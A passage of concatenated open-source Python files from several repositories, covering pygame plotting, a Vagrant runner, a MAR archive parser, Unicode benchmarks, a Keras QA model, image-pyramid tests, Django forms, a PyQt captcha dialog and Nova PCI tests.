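# Illustrative sketch (not called anywhere): how the helpers above could be
# used programmatically rather than via the CLI. It assumes the same
# environment as the script itself (Linux or FreeBSD with linprocfs, run as
# root); the function name and threshold are arbitrary examples.
def _example_top_consumers(threshold_kib=100 * 1024):
    # get_memory_usage() returns (sorted_cmds, shareds, count, total),
    # with every size expressed in KiB.
    sorted_cmds, shareds, count, total = get_memory_usage(None, False)
    for cmd, private_plus_shared in sorted_cmds:
        if private_plus_shared > threshold_kib:
            sys.stdout.write("%sB\t%s\n" % (human(private_plus_shared),
                                            cmd_with_count(cmd, count[cmd])))
    if have_pss:
        sys.stdout.write("total: %sB\n" % human(total))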
gpl-3.0
introprogramming/exercises
exercises/plot_2d/plot_2d.py
1
5835
import math, pygame from pygame.locals import * ############################################# ## Standard colors (RGB) BLACK = (20, 20, 40) WHITE = (255, 255, 255) BLUE = (0, 0, 255) GREEN = (0, 255, 0) RED = (255, 0, 0) ############################################# ## Customize plot here def function_to_print(x): """Write function to plot here. Must take a single number x and return a single number y.""" return -x * (x - 3) # Range of window X_MIN = 0.0 X_MAX = 10.0 Y_MIN = -10.0 Y_MAX = 10.0 # Tick interval on axes X_TICK = 2.5 Y_TICK = 2.5 # Granularity of plotted functions, more points -> higher resolution plot N_POINTS = 100 # Colors background_color = BLACK plot_color = GREEN grid_color = WHITE # Note, it is also possible to make a list of functions to print # and respective colors: # functions = [(f1, color1), (f2, color2), ...] ############################################# ## Let the program calculate the rest WIDTH = 640 HEIGHT = 480 X_SIZE = X_MAX - X_MIN Y_SIZE = Y_MAX - Y_MIN def coordinate_to_position(c): """Converts a model coordinate (vector) into a graphic position (pixel)""" gx = (c[0] - X_MIN) * WIDTH / X_SIZE gy = HEIGHT - (c[1] - Y_MIN) * HEIGHT / Y_SIZE return gx, gy def curve_coordinates(f, x0, x1, points): """Returns list of coordinates Creates linear splines for this function f, from x0 to x1 Length of returned list == points.""" coordinates = [] x = x0 delta = (x1 - x0) / (points - 1) while x <= x1: coordinates += [[x, f(x)]] x += delta return coordinates def linspace(x0, x1, points): """Returns a list of numbers of `points` elements, with constant intervals between `x0` and `x1`""" delta = (x1 - x0) / (points - 1) return map(lambda x: x0 + delta * x, range(points)) def curve_coordinates2(f, x0, x1, points): """(Alternative implementation): This is more compact and functional-like.""" return [[x, f(x)] for x in linspace(x0, x1, points)] def draw_ticks(screen, axis): """Draws appropriate ticks on the specified axis. axis == 0 -> X-axis, otherwise Y-axis. This implementation is not so readable, see alternative implementation for a more readable one.""" if axis == 0: min = X_MIN max = X_MAX tick = X_TICK limit = HEIGHT else: axis = 1 min = Y_MIN max = Y_MAX tick = Y_TICK limit = WIDTH start = min + min % tick end = max - max % tick points = (end - start) / tick + 1 t = limit / 120 for x in linspace(start, end, int(points)): c = [0, 0] c[axis] = x v = coordinate_to_position(c) a = v[1 - axis] + t if a > limit: a = limit b = v[1 - axis] - t if b < 0: b = 0 # Copying v s = list(v) s[1 - axis] = a e = list(v) e[1 - axis] = b pygame.draw.line(screen, grid_color, s, e, 2) def draw_x_ticks(screen): """(Alternative implementation): Draws appropriate ticks on the X-axis.""" start = X_MIN + X_MIN % X_TICK end = X_MAX - X_MAX % X_TICK points = (end - start) / X_TICK + 1 # t == half length of the tick line t = HEIGHT / 120 # one iteration per tick for x in linspace(start, end, int(points)): v = coordinate_to_position([x, 0]) a = v[1] + t b = v[1] - t if a > HEIGHT: a = HEIGHT if b < 0: b = 0 pygame.draw.line(screen, grid_color, [v[0], a], [v[0], b], 2) def draw_y_ticks(screen): """(Alternative implementation): Draws appropriate ticks on the Y-axis. 
This function mirrors draw_x_ticks(...)""" start = Y_MIN + Y_MIN % Y_TICK end = Y_MAX - Y_MAX % Y_TICK points = (end - start) / Y_TICK + 1 t = WIDTH / 120 for y in linspace(start, end, int(points)): v = coordinate_to_position([0, y]) # print v a = v[0] + t b = v[0] - t if (a > WIDTH): a = WIDTH if (b < 0): b = 0 pygame.draw.line(screen, grid_color, [a, v[1]], [b, v[1]], 2) def draw(screen, pp, plot_color): """Plots the points `pp` on the specified screen with the specified color.""" # Function pygame.draw.lines(screen, plot_color, False, pp, 3) def draw_axis(screen): """Draws the axes and ticks of the coordinate system.""" ## Alternative implementations: # draw_x_ticks(screen) # draw_y_ticks(screen) draw_ticks(screen, 0) draw_ticks(screen, 1) x_points = list(map(coordinate_to_position, [[X_MIN, 0], [X_MAX, 0]])) y_points = list(map(coordinate_to_position, [[0, Y_MIN], [0, Y_MAX]])) # X-Axis pygame.draw.lines(screen, grid_color, False, x_points, 2) # Y-Axis pygame.draw.lines(screen, grid_color, False, y_points, 2) def main(): """Graphics: draws graphs on window and await EXIT or ESCAPE.""" pygame.init() screen = pygame.display.set_mode([WIDTH, HEIGHT]) pygame.display.set_caption('Plot 2d') clock = pygame.time.Clock() screen.fill(background_color) cc = curve_coordinates(function_to_print, X_MIN, X_MAX, N_POINTS) pp = list(map(coordinate_to_position, cc)) # This would typically be done inside the loop, but since it is never # updated: might as well keep it outside draw(screen, pp, plot_color) draw_axis(screen) done = False while not done: time = clock.tick(60) pygame.display.update() for e in pygame.event.get(): if e.type == QUIT or (e.type == KEYUP and e.key == K_ESCAPE): done = True break pygame.quit() # if Python says run... if __name__ == '__main__': main()
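
# Illustrative sketch of the "list of functions" idea mentioned in the
# customization section above; it only reuses helpers already defined in this
# file, and the example function/color pairs are placeholders.
def draw_functions(screen, functions):
    """Draw every (function, color) pair in `functions` on `screen`."""
    for f, color in functions:
        cc = curve_coordinates(f, X_MIN, X_MAX, N_POINTS)
        pp = list(map(coordinate_to_position, cc))
        draw(screen, pp, color)

# For example, inside main() after the screen has been filled:
#     draw_functions(screen, [(function_to_print, GREEN),
#                             (math.sin, RED),
#                             (math.cos, BLUE)])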
mit
hitchtest/hitchvagrant
hitchvagrant/vagrant.py
1
1317
from sys import argv, stdout, stderr, exit
from subprocess import call, PIPE
from os import path, chdir
import optparse
import time


def run():
    parser = optparse.OptionParser()
    parser.add_option("-d", "--directory", type="str", dest="directory", default=".",
                      help="Specify the directory that contains the Vagrantfile (default: current directory)")
    options, _ = parser.parse_args(argv[1:])
    directory = path.abspath(options.directory)

    if call(["which", "vagrant"], stdout=PIPE, stderr=PIPE) != 0:
        stderr.write("Vagrant not installed.\n")
        exit(1)

    if path.exists(directory):
        chdir(directory)
    else:
        stderr.write("Directory does not exist.\n")
        exit(1)

    if not path.exists(path.join(directory, "Vagrantfile")):
        stderr.write("Vagrantfile does not exist at '{}'.\n".format(directory))
        exit(1)

    try:
        call(["vagrant", "up"])
        stdout.write("Vagrant service ready\n")
        while True:
            time.sleep(1)
    except (KeyboardInterrupt, SystemExit):
        stdout.write("Shutting down vagrant...\n")
        returncode = call(["vagrant", "halt"])
        if returncode != 0:
            # Fall back to a forced halt if the normal halt failed.
            # (Only call() is imported above, so use it here as well.)
            call(["vagrant", "halt", "--force"])
        exit(0)


if __name__ == '__main__':
    run()
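
# Illustrative invocation (shell), derived from the optparse definition above;
# the directory path is only a placeholder:
#
#   python vagrant.py --directory /path/to/project-with-Vagrantfile
#
# The process keeps the box up until interrupted (Ctrl-C), then halts it.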
agpl-3.0
dannyboi104/SickRage
lib/hachoir_parser/archive/mozilla_ar.py
74
2405
"""MAR (Mozilla ARchive) parser Author: Robert Xiao Creation date: July 10, 2007 """ from hachoir_core.endian import BIG_ENDIAN from hachoir_core.field import (RootSeekableFieldSet, FieldSet, String, CString, UInt32, RawBytes) from hachoir_core.text_handler import displayHandler, filesizeHandler from hachoir_core.tools import humanUnixAttributes from hachoir_parser import HachoirParser class IndexEntry(FieldSet): def createFields(self): yield UInt32(self, "offset", "Offset in bytes relative to start of archive") yield filesizeHandler(UInt32(self, "length", "Length in bytes")) yield displayHandler(UInt32(self, "flags"), humanUnixAttributes) yield CString(self, "name", "Filename (byte array)") def createDescription(self): return 'File %s, Size %s, Mode %s'%( self["name"].display, self["length"].display, self["flags"].display) class MozillaArchive(HachoirParser, RootSeekableFieldSet): MAGIC = "MAR1" PARSER_TAGS = { "id": "mozilla_ar", "category": "archive", "file_ext": ("mar",), "min_size": (8+4+13)*8, # Header, Index Header, 1 Index Entry "magic": ((MAGIC, 0),), "description": "Mozilla Archive", } endian = BIG_ENDIAN def __init__(self, stream, **args): RootSeekableFieldSet.__init__(self, None, "root", stream, None, stream.askSize(self)) HachoirParser.__init__(self, stream, **args) def validate(self): if self.stream.readBytes(0, 4) != self.MAGIC: return "Invalid magic" return True def createFields(self): yield String(self, "magic", 4, "File signature (MAR1)", charset="ASCII") yield UInt32(self, "index_offset", "Offset to index relative to file start") self.seekByte(self["index_offset"].value, False) yield UInt32(self, "index_size", "size of index in bytes") current_index_size = 0 # bytes while current_index_size < self["index_size"].value: # plus 4 compensates for index_size self.seekByte(self["index_offset"].value + current_index_size + 4, False) entry = IndexEntry(self, "index_entry[]") yield entry current_index_size += entry.size // 8 self.seekByte(entry["offset"].value, False) yield RawBytes(self, "file[]", entry["length"].value)
gpl-3.0
meabsence/python-for-android
python3-alpha/python3-src/Tools/pybench/Unicode.py
92
11110
try: unicode except NameError: raise ImportError from pybench import Test class ConcatUnicode(Test): version = 2.0 operations = 10 * 5 rounds = 60000 def test(self): # Make sure the strings are *not* interned s = unicode(u''.join(map(str,range(100)))) t = unicode(u''.join(map(str,range(1,101)))) for i in range(self.rounds): t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s def calibrate(self): s = unicode(u''.join(map(str,range(100)))) t = unicode(u''.join(map(str,range(1,101)))) for i in range(self.rounds): pass class CompareUnicode(Test): version = 2.0 operations = 10 * 5 rounds = 150000 def test(self): # Make sure the strings are *not* interned s = unicode(u''.join(map(str,range(10)))) t = unicode(u''.join(map(str,range(10))) + "abc") for i in range(self.rounds): t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s def calibrate(self): s = unicode(u''.join(map(str,range(10)))) t = unicode(u''.join(map(str,range(10))) + "abc") for i in range(self.rounds): pass class CreateUnicodeWithConcat(Test): version = 2.0 operations = 10 * 5 rounds = 80000 def test(self): for i in range(self.rounds): s = u'om' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' def calibrate(self): for i in range(self.rounds): pass class UnicodeSlicing(Test): version = 2.0 operations = 5 * 7 rounds = 140000 def test(self): s = unicode(u''.join(map(str,range(100)))) for i in range(self.rounds): s[50:] s[:25] s[50:55] s[-1:] s[:1] s[2:] s[11:-11] s[50:] s[:25] s[50:55] s[-1:] s[:1] s[2:] s[11:-11] s[50:] s[:25] s[50:55] s[-1:] s[:1] s[2:] s[11:-11] s[50:] s[:25] s[50:55] s[-1:] s[:1] s[2:] s[11:-11] s[50:] s[:25] s[50:55] s[-1:] s[:1] s[2:] s[11:-11] def calibrate(self): s = unicode(u''.join(map(str,range(100)))) for i in range(self.rounds): pass ### String methods class UnicodeMappings(Test): version = 2.0 operations = 3 * (5 + 4 + 2 + 1) rounds = 10000 def test(self): s = u''.join(map(unichr,range(20))) t = u''.join(map(unichr,range(100))) u = u''.join(map(unichr,range(500))) v = u''.join(map(unichr,range(1000))) for i in range(self.rounds): s.lower() s.lower() s.lower() s.lower() s.lower() s.upper() s.upper() s.upper() s.upper() s.upper() s.title() s.title() s.title() s.title() s.title() t.lower() t.lower() t.lower() t.lower() t.upper() t.upper() t.upper() t.upper() t.title() t.title() t.title() t.title() u.lower() u.lower() u.upper() u.upper() 
u.title() u.title() v.lower() v.upper() v.title() def calibrate(self): s = u''.join(map(unichr,range(20))) t = u''.join(map(unichr,range(100))) u = u''.join(map(unichr,range(500))) v = u''.join(map(unichr,range(1000))) for i in range(self.rounds): pass class UnicodePredicates(Test): version = 2.0 operations = 5 * 9 rounds = 120000 def test(self): data = (u'abc', u'123', u' ', u'\u1234\u2345\u3456', u'\uFFFF'*10) len_data = len(data) for i in range(self.rounds): s = data[i % len_data] s.isalnum() s.isalpha() s.isdecimal() s.isdigit() s.islower() s.isnumeric() s.isspace() s.istitle() s.isupper() s.isalnum() s.isalpha() s.isdecimal() s.isdigit() s.islower() s.isnumeric() s.isspace() s.istitle() s.isupper() s.isalnum() s.isalpha() s.isdecimal() s.isdigit() s.islower() s.isnumeric() s.isspace() s.istitle() s.isupper() s.isalnum() s.isalpha() s.isdecimal() s.isdigit() s.islower() s.isnumeric() s.isspace() s.istitle() s.isupper() s.isalnum() s.isalpha() s.isdecimal() s.isdigit() s.islower() s.isnumeric() s.isspace() s.istitle() s.isupper() def calibrate(self): data = (u'abc', u'123', u' ', u'\u1234\u2345\u3456', u'\uFFFF'*10) len_data = len(data) for i in range(self.rounds): s = data[i % len_data] try: import unicodedata except ImportError: pass else: class UnicodeProperties(Test): version = 2.0 operations = 5 * 8 rounds = 100000 def test(self): data = (u'a', u'1', u' ', u'\u1234', u'\uFFFF') len_data = len(data) digit = unicodedata.digit numeric = unicodedata.numeric decimal = unicodedata.decimal category = unicodedata.category bidirectional = unicodedata.bidirectional decomposition = unicodedata.decomposition mirrored = unicodedata.mirrored combining = unicodedata.combining for i in range(self.rounds): c = data[i % len_data] digit(c, None) numeric(c, None) decimal(c, None) category(c) bidirectional(c) decomposition(c) mirrored(c) combining(c) digit(c, None) numeric(c, None) decimal(c, None) category(c) bidirectional(c) decomposition(c) mirrored(c) combining(c) digit(c, None) numeric(c, None) decimal(c, None) category(c) bidirectional(c) decomposition(c) mirrored(c) combining(c) digit(c, None) numeric(c, None) decimal(c, None) category(c) bidirectional(c) decomposition(c) mirrored(c) combining(c) digit(c, None) numeric(c, None) decimal(c, None) category(c) bidirectional(c) decomposition(c) mirrored(c) combining(c) def calibrate(self): data = (u'a', u'1', u' ', u'\u1234', u'\uFFFF') len_data = len(data) digit = unicodedata.digit numeric = unicodedata.numeric decimal = unicodedata.decimal category = unicodedata.category bidirectional = unicodedata.bidirectional decomposition = unicodedata.decomposition mirrored = unicodedata.mirrored combining = unicodedata.combining for i in range(self.rounds): c = data[i % len_data]
apache-2.0
IgowWang/ML_python3
kerasgo/qa.py
2
4487
#!/usr/bin/env python # -*- coding: utf-8 -*- # author igor # Created by iFantastic on 16-6-3 import re import tarfile from functools import reduce import numpy as np import nltk from keras.preprocessing.sequence import pad_sequences from keras.layers.embeddings import Embedding from keras.layers.core import Dense, Merge from keras.layers import recurrent from keras.models import Sequential from keras.utils.visualize_util import plot np.random.seed(1337) DATA_PATH = '/data/task_qa.tar.gz' tar = tarfile.open(DATA_PATH) challenge = 'tasks_1-20_v1-2/en-10k/qa2_two-supporting-facts_{}.txt' def parse_stories(lines, only_supporting=False): data = [] story = [] for line in lines: line = line.decode() line = line.strip() nid, line = line.split(' ', 1) nid = int(nid) if nid == 1: story = [] if '\t' in line: q, a, supporting = line.split('\t') q = nltk.word_tokenize(q) substory = None if only_supporting: supporting = map(int, supporting.split()) substory = [story[i - 1] for i in supporting] else: substory = [x for x in story if x] data.append((substory, q, a)) story.append('') else: sent = nltk.word_tokenize(line) story.append(sent) return data def get_stories(f, only_supporting=False, max_length=50): data = parse_stories(f.readlines(), only_supporting=only_supporting) flatten = lambda data: reduce(lambda x, y: x + y, data) data = [(flatten(story), q, answer) for story, q, answer in data if max_length or len(flatten(story)) < max_length] return data def vectorize_stories(data, word2id, vocab_size, story_maxlen, query_maxlen): X = [] Xq = [] Y = [] for story, query, answer in data: x = [word2id[w] for w in story] xq = [word2id[w] for w in query] y = np.zeros(vocab_size) y[word2id[answer]] = 1 X.append(x) Xq.append(xq) Y.append(y) return pad_sequences(X, maxlen=story_maxlen), pad_sequences(Xq, maxlen=query_maxlen), np.array(Y) def main(): RNN = recurrent.GRU EMBED_HIDDEN_SIZE = 50 SENT_HIDDEN_SIZE = 100 QUERY_HIDDEN_SIZE = 100 BATCH_SIZE = 32 EPOCHS = 5 print('RNN / Embed / Sent / Query = {}, {}, {}, {}'.format(RNN, EMBED_HIDDEN_SIZE, SENT_HIDDEN_SIZE, QUERY_HIDDEN_SIZE)) train = get_stories(tar.extractfile(challenge.format('train'))) test = get_stories(tar.extractfile(challenge.format('test'))) vocab = sorted(reduce(lambda x, y: x | y, (set(story + q + [answer]) for story, q, answer in train + test))) vocab_size = len(vocab) + 1 word2id = dict((c, i + 1) for i, c in enumerate(vocab)) story_maxlen = max(map(len, (x for x, _, _ in train + test))) query_maxlen = max(map(len, (x for _, x, _ in train + test))) X, Xq, Y = vectorize_stories(train, word2id, vocab_size, story_maxlen, query_maxlen) tX, tXq, tY = vectorize_stories(test, word2id, vocab_size, story_maxlen, query_maxlen) print('vocab = {}'.format(vocab)) print('X.shape = {}'.format(X.shape)) print('Xq.shape = {}'.format(Xq.shape)) print('Y.shape = {}'.format(Y.shape)) print('story_maxlen, query_maxlen = {}, {}'.format(story_maxlen, query_maxlen)) print('Build model...') sentrnn = Sequential() sentrnn.add(Embedding(vocab_size, EMBED_HIDDEN_SIZE, input_length=story_maxlen)) sentrnn.add(RNN(SENT_HIDDEN_SIZE, return_sequences=False)) qrnn = Sequential() qrnn.add(Embedding(vocab_size, EMBED_HIDDEN_SIZE, input_length=query_maxlen)) qrnn.add(RNN(QUERY_HIDDEN_SIZE, return_sequences=False)) model = Sequential() model.add(Merge([sentrnn, qrnn], mode='concat')) model.add((Dense(vocab_size, activation='softmax'))) model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy']) # plot(model) print("Training") model.fit([X, Xq], Y, 
batch_size=BATCH_SIZE, nb_epoch=EPOCHS, validation_split=0.05, verbose=True) loss, acc = model.evaluate([tX, tXq], tY, batch_size=BATCH_SIZE) print('Test loss / test accuracy = {:.4f} / {:.4f}'.format(loss, acc)) if __name__ == '__main__': # data = get_stories(tar.extractfile(challenge.format('train'))) # print(data[0]) main()
gpl-3.0
jwiggins/scikit-image
skimage/transform/tests/test_pyramids.py
35
2302
from numpy.testing import assert_array_equal, assert_raises, run_module_suite from skimage import data from skimage.transform import pyramids image = data.astronaut() image_gray = image[..., 0] def test_pyramid_reduce_rgb(): rows, cols, dim = image.shape out = pyramids.pyramid_reduce(image, downscale=2) assert_array_equal(out.shape, (rows / 2, cols / 2, dim)) def test_pyramid_reduce_gray(): rows, cols = image_gray.shape out = pyramids.pyramid_reduce(image_gray, downscale=2) assert_array_equal(out.shape, (rows / 2, cols / 2)) def test_pyramid_expand_rgb(): rows, cols, dim = image.shape out = pyramids.pyramid_expand(image, upscale=2) assert_array_equal(out.shape, (rows * 2, cols * 2, dim)) def test_pyramid_expand_gray(): rows, cols = image_gray.shape out = pyramids.pyramid_expand(image_gray, upscale=2) assert_array_equal(out.shape, (rows * 2, cols * 2)) def test_build_gaussian_pyramid_rgb(): rows, cols, dim = image.shape pyramid = pyramids.pyramid_gaussian(image, downscale=2) for layer, out in enumerate(pyramid): layer_shape = (rows / 2 ** layer, cols / 2 ** layer, dim) assert_array_equal(out.shape, layer_shape) def test_build_gaussian_pyramid_gray(): rows, cols = image_gray.shape pyramid = pyramids.pyramid_gaussian(image_gray, downscale=2) for layer, out in enumerate(pyramid): layer_shape = (rows / 2 ** layer, cols / 2 ** layer) assert_array_equal(out.shape, layer_shape) def test_build_laplacian_pyramid_rgb(): rows, cols, dim = image.shape pyramid = pyramids.pyramid_laplacian(image, downscale=2) for layer, out in enumerate(pyramid): layer_shape = (rows / 2 ** layer, cols / 2 ** layer, dim) assert_array_equal(out.shape, layer_shape) def test_build_laplacian_pyramid_gray(): rows, cols = image_gray.shape pyramid = pyramids.pyramid_laplacian(image_gray, downscale=2) for layer, out in enumerate(pyramid): layer_shape = (rows / 2 ** layer, cols / 2 ** layer) assert_array_equal(out.shape, layer_shape) def test_check_factor(): assert_raises(ValueError, pyramids._check_factor, 0.99) assert_raises(ValueError, pyramids._check_factor, - 2) if __name__ == "__main__": run_module_suite()
bsd-3-clause
hqpr/findyour3d
findyour3d/company/forms.py
1
6270
from django import forms from .models import Company, SpecialOffer EXPEDITED_CHOICES = ( (0, 'No, we do not offer any expedited shipping options.'), (1, 'Yes we offer an expedited process for a fee.') ) class AddCompanyForm(forms.ModelForm): class Meta: model = Company fields = ['name', 'display_name', 'address_line_1', 'address_line_2', 'full_name', 'email', 'phone', 'website', 'ideal_customer', 'is_cad_assistance', 'budget', 'material', 'top_printing_processes', 'description', 'user'] widgets = { 'name': forms.TextInput(attrs={'class': 'form-control'}), 'display_name': forms.TextInput(attrs={'class': 'form-control'}), 'address_line_1': forms.TextInput(attrs={'class': 'form-control'}), 'address_line_2': forms.TextInput(attrs={'class': 'form-control'}), 'full_name': forms.TextInput(attrs={'class': 'form-control'}), 'email': forms.TextInput(attrs={'class': 'form-control'}), 'phone': forms.TextInput(attrs={'class': 'form-control'}), 'website': forms.TextInput(attrs={'class': 'form-control'}), 'ideal_customer': forms.SelectMultiple(attrs={'class': 'form-control edited'}), 'budget': forms.SelectMultiple(attrs={'class': 'form-control edited'}), 'material': forms.SelectMultiple(attrs={'class': 'form-control edited big_height_block'}), 'top_printing_processes': forms.SelectMultiple(attrs={'class': 'form-control edited big_height_block'}), 'description': forms.Textarea(attrs={'class': 'form-control', 'rows': 10}), 'quote_limit': forms.NumberInput(attrs={'class': 'form-control edited'}), 'user': forms.HiddenInput(), } def __init__(self, *args, **kwargs): self.user = None if 'user' in kwargs['initial']: self.user = kwargs['initial'].pop('user') super(AddCompanyForm, self).__init__(*args, **kwargs) self.fields['user'].initial = self.user self.fields['ideal_customer'].label = 'What is your company’s ideal customer that we should send to you?' self.fields['budget'].label = 'What is your ideal order cost/budget?' 
self.fields['top_printing_processes'].label = 'Printing Processes Available' self.fields['name'].label = 'Company Name' # self.fields['quote_limit'].required = False self.fields['display_name'].label = 'Company Display Name' self.fields['full_name'].label = "Company Contact's Full Name" self.fields['email'].label = "Company Contact's Email" class EditCompanyForm(forms.ModelForm): class Meta: model = Company fields = ['name', 'display_name', 'logo', 'address_line_1', 'address_line_2', 'full_name', 'email', 'phone', 'website', 'ideal_customer', 'is_cad_assistance', 'budget', 'material', 'top_printing_processes', 'description', 'user', 'is_expedited', 'shipping', 'quote_limit'] widgets = { 'name': forms.TextInput(attrs={'class': 'form-control'}), 'display_name': forms.TextInput(attrs={'class': 'form-control'}), 'logo': forms.ClearableFileInput(attrs={'class': 'form-control'}), 'address_line_1': forms.TextInput(attrs={'class': 'form-control'}), 'address_line_2': forms.TextInput(attrs={'class': 'form-control'}), 'full_name': forms.TextInput(attrs={'class': 'form-control'}), 'email': forms.TextInput(attrs={'class': 'form-control'}), 'phone': forms.TextInput(attrs={'class': 'form-control'}), 'website': forms.TextInput(attrs={'class': 'form-control'}), 'ideal_customer': forms.SelectMultiple(attrs={'class': 'form-control edited'}), 'budget': forms.SelectMultiple(attrs={'class': 'form-control edited'}), 'is_expedited': forms.Select(attrs={'class': 'form-control edited'}, choices=EXPEDITED_CHOICES), 'material': forms.SelectMultiple(attrs={'class': 'form-control edited big_height_block'}), 'top_printing_processes': forms.SelectMultiple(attrs={'class': 'form-control edited big_height_block'}), 'description': forms.Textarea(attrs={'class': 'form-control', 'rows': 10}), 'shipping': forms.SelectMultiple(attrs={'class': 'form-control edited'}), 'quote_limit': forms.NumberInput(attrs={'class': 'form-control edited'}), 'user': forms.HiddenInput(), } def __init__(self, *args, **kwargs): self.user = None if 'user' in kwargs['initial']: self.user = kwargs['initial'].pop('user') super(EditCompanyForm, self).__init__(*args, **kwargs) self.fields['user'].initial = self.user self.fields['ideal_customer'].label = 'What is your company’s ideal customer that we should send to you?' self.fields['budget'].label = 'What is your ideal order cost/budget?' self.fields['is_expedited'].label = 'Do you offer an expedited manufacturing process?' self.fields['shipping'].label = 'Which of the following shipping options do you offer?' self.fields['quote_limit'].required = False self.fields['name'].label = 'Company Name' self.fields['display_name'].label = 'Company Display Name' self.fields['full_name'].label = "Company Contact's Full Name" self.fields['email'].label = "Company Contact's Email" class AddSpecialOfferForm(forms.ModelForm): class Meta: model = SpecialOffer fields = ('text', 'company') widgets = { 'text': forms.Textarea(attrs={'class': 'form-control', 'rows': 3, 'placeholder': 'eg: 25% off for next order!'}), 'company': forms.HiddenInput() } def __init__(self, *args, **kwargs): self.user = None if 'company' in kwargs['initial']: self.company = kwargs['initial'].pop('company') super(AddSpecialOfferForm, self).__init__(*args, **kwargs) self.fields['company'].initial = self.company
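
# Illustrative sketch only: how a view might construct these forms. The
# __init__ methods above read 'user' / 'company' out of the `initial` dict,
# so callers are expected to pass it; the view and template names below are
# placeholders, not part of this app.
#
#   def add_company(request):
#       form = AddCompanyForm(request.POST or None,
#                             initial={'user': request.user.id})
#       if request.method == 'POST' and form.is_valid():
#           form.save()
#       return render(request, 'company/add_company.html', {'form': form})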
mit
seberm/Titulky.com-Downloader
prototypes/captcha-qt/captcha.py
1
2280
import sys from PyQt4 import QtGui, QtCore, QtNetwork from PyQt4.QtCore import SLOT, SIGNAL CAPTCHA_URL = 'http://www.titulky.com/captcha/captcha.php' MAX_CAPTCHA_LEN = 8 class CaptchaDialog(QtGui.QDialog): # Signal is emmited if captcha code is sucessfuly re-typed codeRead = QtCore.pyqtSignal() def __init__(self, parent = None, flags = 0): super(CaptchaDialog, self).__init__(parent) self.setWindowTitle('Re-type captcha') # Widgets self.lblCaptcha = QtGui.QLabel('Loading captcha image ...', self) self.lblCaptcha.setFixedSize(200, 70) self.btnReload = QtGui.QPushButton('Reload', self) self.connect(self.btnReload, SIGNAL("clicked()"), self.reloadCaptcha) self.btnSend = QtGui.QPushButton('Send', self) self.connect(self.btnSend, SIGNAL("clicked()"), self.sendCode) self.leCode = QtGui.QLineEdit(self) self.leCode.setFocus() self.leCode.setMaxLength(MAX_CAPTCHA_LEN) layout = QtGui.QGridLayout() layout.addWidget(self.lblCaptcha) layout.addWidget(self.btnReload) layout.addWidget(self.leCode) layout.addWidget(self.btnSend) self.setLayout(layout) # Load captcha into label self.manager = QtNetwork.QNetworkAccessManager(self) self.connect(self.manager, SIGNAL("finished(QNetworkReply*)"), self.managerFinished) self.reloadCaptcha() def managerFinished(self, reply): if reply.error() != QtNetwork.QNetworkReply.NoError: self.lblCaptcha.setText('Error in loading captcha image') print(reply.errorString()) return data = reply.readAll() pixmap = QtGui.QPixmap() pixmap.loadFromData(data) self.lblCaptcha.setPixmap(pixmap) def reloadCaptcha(self): url = QtCore.QUrl(CAPTCHA_URL) request = QtNetwork.QNetworkRequest(url) self.manager.get(request) def sendCode(self): self.leCode.setDisabled(True) self.captchaCode = self.leCode.text() # We just emit a signal self.codeRead.emit() #self.close() if __name__ == '__main__': app = QtGui.QApplication(sys.argv) sys.exit(CaptchaDialog().exec_())
gpl-3.0
CEG-FYP-OpenStack/scheduler
nova/tests/unit/pci/test_request.py
11
7404
# Copyright 2013 Intel Corporation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for PCI request.""" from nova import exception from nova.pci import request from nova import test _fake_alias1 = """{ "name": "QuicAssist", "capability_type": "pci", "product_id": "4443", "vendor_id": "8086", "device_type": "type-PCI" }""" _fake_alias11 = """{ "name": "QuicAssist", "capability_type": "pci", "product_id": "4444", "vendor_id": "8086", "device_type": "type-PCI" }""" _fake_alias2 = """{ "name": "xxx", "capability_type": "pci", "product_id": "1111", "vendor_id": "1111", "device_type": "N" }""" _fake_alias3 = """{ "name": "IntelNIC", "capability_type": "pci", "product_id": "1111", "vendor_id": "8086", "device_type": "type-PF" }""" class AliasTestCase(test.NoDBTestCase): def test_good_alias(self): self.flags(pci_alias=[_fake_alias1]) als = request._get_alias_from_config() self.assertIsInstance(als['QuicAssist'], list) expect_dict = { "capability_type": "pci", "product_id": "4443", "vendor_id": "8086", "dev_type": "type-PCI" } self.assertEqual(expect_dict, als['QuicAssist'][0]) def test_multispec_alias(self): self.flags(pci_alias=[_fake_alias1, _fake_alias11]) als = request._get_alias_from_config() self.assertIsInstance(als['QuicAssist'], list) expect_dict1 = { "capability_type": "pci", "product_id": "4443", "vendor_id": "8086", "dev_type": "type-PCI" } expect_dict2 = { "capability_type": "pci", "product_id": "4444", "vendor_id": "8086", "dev_type": "type-PCI" } self.assertEqual(expect_dict1, als['QuicAssist'][0]) self.assertEqual(expect_dict2, als['QuicAssist'][1]) def 